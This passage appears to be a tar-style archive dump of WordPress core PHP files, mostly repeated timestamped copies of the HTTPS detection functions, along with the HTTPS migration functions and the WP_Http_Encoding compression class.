return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260605132821.php 0000666 00000011205 15224151221 0011767 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605112545.php 0000666 00000013341 15224151221 0011760 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
class-wp-http-encoding-20260621081201.php 0000666 00000015041 15224151221 0013123 0 ustar 00 <?php
/**
* HTTP API: WP_Http_Encoding class
*
* @package WordPress
* @subpackage HTTP
* @since 4.4.0
*/
/**
* Core class used to implement deflate and gzip transfer encoding support for HTTP requests.
*
* Includes RFC 1950, RFC 1951, and RFC 1952.
*
* @since 2.8.0
*/
#[AllowDynamicProperties]
class WP_Http_Encoding {
/**
* Compress raw string using the deflate format.
*
* Supports the RFC 1951 standard.
*
* @since 2.8.0
*
* @param string $raw String to compress.
* @param int $level Optional. Compression level, 9 is highest. Default 9.
* @param string $supports Optional, not used. When implemented it will choose
* the right compression based on what the server supports.
* @return string|false Compressed string on success, false on failure.
*/
public static function compress( $raw, $level = 9, $supports = null ) {
return gzdeflate( $raw, $level );
}
/**
* Decompression of deflated string.
*
* Will attempt to decompress using the RFC 1950 standard, and if that fails
* then the RFC 1951 standard deflate will be attempted. Finally, the RFC
* 1952 standard gzip decode will be attempted. If all fail, then the
* original compressed string will be returned.
*
* @since 2.8.0
*
* @param string $compressed String to decompress.
* @param int $length The optional length of the compressed data.
* @return string|false Decompressed string on success, false on failure.
*/
public static function decompress( $compressed, $length = null ) {
if ( empty( $compressed ) ) {
return $compressed;
}
$decompressed = @gzinflate( $compressed );
if ( false !== $decompressed ) {
return $decompressed;
}
$decompressed = self::compatible_gzinflate( $compressed );
if ( false !== $decompressed ) {
return $decompressed;
}
$decompressed = @gzuncompress( $compressed );
if ( false !== $decompressed ) {
return $decompressed;
}
if ( function_exists( 'gzdecode' ) ) {
$decompressed = @gzdecode( $compressed );
if ( false !== $decompressed ) {
return $decompressed;
}
}
return $compressed;
}
/**
* Decompression of deflated string while staying compatible with the majority of servers.
*
* Certain Servers will return deflated data with headers which PHP's gzinflate()
* function cannot handle out of the box. The following function has been created from
* various snippets on the gzinflate() PHP documentation.
*
* Warning: Magic numbers within. Due to the potential different formats that the compressed
* data may be returned in, some "magic offsets" are needed to ensure proper decompression
* takes place. For a simple pragmatic way to determine the magic offset in use, see:
* https://core.trac.wordpress.org/ticket/18273
*
* @since 2.8.1
*
* @link https://core.trac.wordpress.org/ticket/18273
* @link https://www.php.net/manual/en/function.gzinflate.php#70875
* @link https://www.php.net/manual/en/function.gzinflate.php#77336
*
* @param string $gz_data String to decompress.
* @return string|false Decompressed string on success, false on failure.
*/
public static function compatible_gzinflate( $gz_data ) {
// Compressed data might contain a full header, if so strip it for gzinflate().
if ( str_starts_with( $gz_data, "\x1f\x8b\x08" ) ) {
$i = 10;
$flg = ord( substr( $gz_data, 3, 1 ) );
if ( $flg > 0 ) {
if ( $flg & 4 ) {
list($xlen) = unpack( 'v', substr( $gz_data, $i, 2 ) );
$i = $i + 2 + $xlen;
}
if ( $flg & 8 ) {
$i = strpos( $gz_data, "\0", $i ) + 1;
}
if ( $flg & 16 ) {
$i = strpos( $gz_data, "\0", $i ) + 1;
}
if ( $flg & 2 ) {
$i = $i + 2;
}
}
$decompressed = @gzinflate( substr( $gz_data, $i, -8 ) );
if ( false !== $decompressed ) {
return $decompressed;
}
}
// Compressed data from java.util.zip.Deflater amongst others.
$decompressed = @gzinflate( substr( $gz_data, 2 ) );
if ( false !== $decompressed ) {
return $decompressed;
}
return false;
}
/**
* What encoding types to accept and their priority values.
*
* @since 2.8.0
*
* @param string $url
* @param array $args
* @return string Types of encoding to accept.
*/
public static function accept_encoding( $url, $args ) {
$type = array();
$compression_enabled = self::is_available();
if ( ! $args['decompress'] ) { // Decompression specifically disabled.
$compression_enabled = false;
} elseif ( $args['stream'] ) { // Disable when streaming to file.
$compression_enabled = false;
} elseif ( isset( $args['limit_response_size'] ) ) { // If only partial content is being requested, we won't be able to decompress it.
$compression_enabled = false;
}
if ( $compression_enabled ) {
if ( function_exists( 'gzinflate' ) ) {
$type[] = 'deflate;q=1.0';
}
if ( function_exists( 'gzuncompress' ) ) {
$type[] = 'compress;q=0.5';
}
if ( function_exists( 'gzdecode' ) ) {
$type[] = 'gzip;q=0.5';
}
}
/**
* Filters the allowed encoding types.
*
* @since 3.6.0
*
* @param string[] $type Array of what encoding types to accept and their priority values.
* @param string $url URL of the HTTP request.
* @param array $args HTTP request arguments.
*/
$type = apply_filters( 'wp_http_accept_encoding', $type, $url, $args );
return implode( ', ', $type );
}
/**
* What encoding the content used when it was compressed to send in the headers.
*
* @since 2.8.0
*
* @return string Content-Encoding string to send in the header.
*/
public static function content_encoding() {
return 'deflate';
}
/**
* Whether the content be decoded based on the headers.
*
* @since 2.8.0
*
* @param array|string $headers All of the available headers.
* @return bool
*/
public static function should_decode( $headers ) {
if ( is_array( $headers ) ) {
if ( array_key_exists( 'content-encoding', $headers ) && ! empty( $headers['content-encoding'] ) ) {
return true;
}
} elseif ( is_string( $headers ) ) {
return ( stripos( $headers, 'content-encoding:' ) !== false );
}
return false;
}
/**
* Whether decompression and compression are supported by the PHP version.
*
* Each function is tested instead of checking for the zlib extension, to
* ensure that the functions all exist in the PHP version and aren't
* disabled.
*
* @since 2.8.0
*
* @return bool
*/
public static function is_available() {
return ( function_exists( 'gzuncompress' ) || function_exists( 'gzdeflate' ) || function_exists( 'gzinflate' ) );
}
}
https-detection-20260605111237-20260621081115.php 0000666 00000013341 15224151221 0013335 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605071928-20260621203046.php 0000666 00000013341 15224151221 0013350 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260606083044.php 0000666 00000013341 15224151221 0011762 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
